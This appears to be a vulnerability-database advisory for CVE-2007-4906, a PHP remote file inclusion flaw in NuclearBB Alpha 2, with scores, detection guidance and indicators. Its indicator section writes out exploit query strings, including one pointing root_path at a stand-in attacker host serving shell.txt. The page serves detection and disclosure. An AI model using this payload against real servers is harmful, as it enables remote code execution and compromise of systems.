cbcvebase.
CVE-2007-4906
published 2007-09-17

CVE-2007-4906: PHP remote file inclusion vulnerability in tasks/send_queued_emails.php in NuclearBB Alpha 2, when register_globals is enabled, allows remote attackers to…

PriorityP344medium6.8CVSS 2.0
AVNACMAuNCPIPAP
EXPLOIT
EPSS
38.38%
98.4th percentile
PHP remote file inclusion vulnerability in tasks/send_queued_emails.php in NuclearBB Alpha 2, when register_globals is enabled, allows remote attackers to execute arbitrary PHP code via a URL in the root_path parameter.

Affected

1 ranges
VendorProductVersion rangeFixed in
nuclearbbnuclearbb

Detection & IOCsextracted from sources · hover to see the quote

path/NuclearBB/tasks/send_queued_emails.php
urlhttp://localhost/NuclearBB/tasks/send_queued_emails.php?root_path=http://localhost/shell.txt?
commandroot_path=http://[attacker]/shell.txt?
  • Monitor HTTP GET requests to send_queued_emails.php containing a URL (http:// or https://) in the root_path parameter, which indicates an RFI exploitation attempt.
  • The trailing '?' appended to the injected URL (e.g., shell.txt?) is a classic RFI technique to nullify the appended local path string; detect this pattern in query strings targeting root_path.
  • The vulnerable code path is line 14 of send_queued_emails.php: require("$root_path/inc/functions_email.php"); — any unsanitised URL value in root_path will be remotely included.
  • Exploitation requires register_globals to be enabled on the target server; correlate findings with server configuration checks for register_globals=On.
  • ·This vulnerability is only exploitable when PHP's register_globals directive is enabled (On). Servers with register_globals=Off are not affected.
CVEs like this are exactly what “Exploited This Week” covers.

Every Monday: what got weaponized or added to CISA KEV in the last seven days — each CVE cross-linked to its PoC, Nuclei template, and detection rule. Free, one email a week, unsubscribe in one click.